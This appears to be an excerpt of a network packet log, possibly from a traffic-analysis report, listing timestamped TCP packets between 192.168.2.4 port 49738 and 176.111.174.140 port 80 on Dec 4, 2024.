                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.200392008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.201493025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.201567888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.201647043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.202549934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.202636957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.202730894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.203655005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.203918934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.204003096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.204797983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.204920053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.204999924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.205856085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.206026077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.206124067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.206940889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.207149029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.207227945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.208427906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.208590031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.208694935 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.209707975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.209789991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.209971905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.210689068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.210781097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.210850954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.211622953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.211728096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.211805105 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.212743998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.212833881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.213021994 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.213748932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.213812113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.213906050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.214673996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.256700993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.349786997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.349869967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.350080013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.350100994 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.350148916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.350271940 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.351187944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.351270914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.351353884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352281094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352368116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352474928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352833986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352906942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.352988958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.353775024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.353811026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.353893995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.354728937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.354794025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.354897976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.355653048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.355731010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.355833054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.356600046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.356749058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.356868029 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.357738972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.357862949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.357990980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.358820915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.358943939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.359021902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.359946966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.360105991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.360213041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.361051083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.361172915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.361267090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.362179995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.362248898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.362407923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.363287926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.363452911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.363590956 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.364336014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.364500999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.364588976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.365420103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.365549088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.365658998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.366601944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.366641998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.366744041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.367703915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.367810011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.367935896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.368736029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.368828058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.369106054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.369910955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.370021105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.370340109 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.370985985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.371130943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.371222973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.372064114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.372173071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.372504950 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.373188972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.373214960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.373385906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.374372005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.374429941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.374516964 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.375375032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.375509977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.375602961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.376527071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.376725912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.376822948 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.377625942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.377752066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.377827883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.378734112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.378808022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.378998995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.379930973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.380063057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.380228996 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.380933046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.381021023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.381745100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.381995916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.382071972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.382174969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.383268118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.383512020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.383610964 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.384236097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.384382010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.385314941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.385417938 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.385430098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.385519981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.386428118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.386657953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.387618065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.387684107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.387706041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.387765884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.388679028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.388772011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.389764071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.389851093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.389893055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.389992952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.390826941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.390930891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.391069889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.392004967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.392132044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.393138885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.393228054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.393254042 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.393285036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.394206047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.394351006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.394449949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.395292044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.395406961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.395515919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.396472931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.396881104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.396981001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.397545099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.397823095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.397921085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.398587942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.398665905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.398799896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.399929047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.400077105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.400182009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.400810003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.400886059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.400996923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.402002096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.402235031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.402335882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.403173923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.403325081 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.404136896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.404165030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.404349089 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.404433966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.405260086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.405442953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.405599117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.406397104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.406491041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.406657934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543036938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543198109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543328047 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543550968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543715954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.543817043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.544672012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.544857025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.544936895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.545339108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.545351982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.545443058 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.545901060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.546020985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.546091080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.547014952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.547193050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.547389030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.548099995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.548157930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.548265934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.549211979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.549257040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.549355984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.550317049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.550509930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.550657988 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.551436901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.551542044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.552582979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.552619934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.552658081 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.552920103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.553699970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.553859949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.553947926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.555035114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.555088043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.555356979 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.555851936 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.555962086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.556037903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.556934118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.557054043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.557143927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.558126926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.558499098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.558664083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.559155941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.559261084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.560198069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.560280085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.560429096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.560518980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.561470985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.561542034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.561662912 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.562495947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.562547922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.562623024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.563589096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.563754082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.563839912 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.564666986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.564781904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.564848900 CET4973880192.168.2.4176.111.174.140
